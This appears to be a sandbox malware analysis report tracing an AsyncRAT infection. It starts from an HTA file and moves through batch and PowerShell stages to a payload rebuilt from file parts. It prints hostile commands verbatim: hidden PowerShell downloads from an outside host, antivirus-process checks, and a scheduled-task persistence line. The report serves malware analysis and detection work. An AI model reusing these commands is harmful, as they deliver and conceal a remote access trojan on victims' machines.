              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.globalsign.com/reancel
              Source: Carter.pif.19.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.drString found in binary or memory: https://www.globalsign.com/repository/06
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004050CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01054830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_01054830
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,36_2_008A4830
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01054632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,28_2_01054632
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044A5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0106D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,28_2_0106D164
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,36_2_008BD164

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Drops large PE files
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile dump: msword.exe.12.dr 891289591Jump to dropped file
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Wscript called in batch mode (surpress errors)
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044365: CreateFileW,_memset,DeviceIoControl,CloseHandle,28_2_01044365
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01038F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_01038F2E
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,15_2_00403883
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01045778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,28_2_01045778
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00895778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,36_2_00895778
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\DistributionsPit
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeFile created: C:\Windows\PrintersOngoing
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_0040497C15_2_0040497C
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406ED215_2_00406ED2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004074BB15_2_004074BB
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FEB02028_2_00FEB020
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FE94E028_2_00FE94E0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FE9C8028_2_00FE9C80
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010023F528_2_010023F5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0101650228_2_01016502
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0106840028_2_01068400
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FEE6F028_2_00FEE6F0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0101265E28_2_0101265E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010189BF28_2_010189BF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100282A28_2_0100282A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF0BE028_2_00FF0BE0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01060A3A28_2_01060A3A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01016A7428_2_01016A74
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100CD5128_2_0100CD51
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0103EDB228_2_0103EDB2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01016FE628_2_01016FE6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01048E4428_2_01048E44
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01060EB728_2_01060EB7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010033B728_2_010033B7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FFD45D28_2_00FFD45D
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100F40928_2_0100F409
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FEF6A028_2_00FEF6A0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FE166328_2_00FE1663
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FFF62828_2_00FFF628
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010016B428_2_010016B4
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010078C328_2_010078C3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100DBA528_2_0100DBA5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01001BA828_2_01001BA8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FFDD2828_2_00FFDD28
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01019CE528_2_01019CE5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01001FC028_2_01001FC0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0100BFD628_2_0100BFD6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0083B02036_2_0083B020
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008394E036_2_008394E0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00839C8036_2_00839C80
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008523F536_2_008523F5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008B840036_2_008B8400
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0086650236_2_00866502
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0083E6F036_2_0083E6F0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0086265E36_2_0086265E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085282A36_2_0085282A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008689BF36_2_008689BF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008B0A3A36_2_008B0A3A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00866A7436_2_00866A74
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00840BE036_2_00840BE0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0088EDB236_2_0088EDB2
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085CD5136_2_0085CD51
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008B0EB736_2_008B0EB7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00898E4436_2_00898E44
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00866FE636_2_00866FE6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008533B736_2_008533B7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085F40936_2_0085F409
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0084D45D36_2_0084D45D
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0083F6A036_2_0083F6A0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008516B436_2_008516B4
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0084F62836_2_0084F628
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0083166336_2_00831663
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008578C336_2_008578C3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085DBA536_2_0085DBA5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00851BA836_2_00851BA8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00869CE536_2_00869CE5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0084DD2836_2_0084DD28
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00851FC036_2_00851FC0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_0085BFD636_2_0085BFD6
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 01000D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 00FF1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: String function: 01008B30 appears 42 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 00850D17 appears 70 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 00841A36 appears 34 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: String function: 00858B30 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062A3 appears 58 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 00801F37 appears 49 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 28.3.Carter.pif.3c63cf0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 40.2.RegAsm.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.csCryptographic APIs: 'TransformFinalBlock'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, JbeTyT6ozehDZJ.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.expl.evad.winHTA@70/82@4/1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104A6AD GetLastError,FormatMessageW,28_2_0104A6AD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01038DE9 AdjustTokenPrivileges,CloseHandle,28_2_01038DE9
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01039399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,28_2_01039399
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00888DE9 AdjustTokenPrivileges,CloseHandle,36_2_00888DE9
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00889399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,36_2_00889399
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044A5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,28_2_01044148
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004024FB CoCreateInstance,15_2_004024FB
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_0104443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,28_2_0104443D
              Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c[1].batJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
              Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\temp.batJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
